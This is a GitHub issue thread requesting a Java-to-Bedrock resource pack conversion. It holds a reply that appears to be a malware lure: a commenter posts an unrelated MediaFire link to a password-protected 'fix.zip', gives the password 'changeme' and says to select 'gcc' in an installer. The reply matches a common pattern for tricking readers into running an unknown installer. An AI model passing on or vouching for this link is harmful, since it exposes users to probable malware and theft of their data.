### ISSUE TITLE
[Pack]: b

### ISSUE THREAD

**Issue by Maaaccccc** [Kas-tle/java2bedrock.sh#33321]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/gdhpbu2o5irfjasidnnxp/generated.zip?rlkey=u4wcfijq7k1n755napai9d3fq&st=um4rpqbt&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

entity_alphatest_one_sided

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
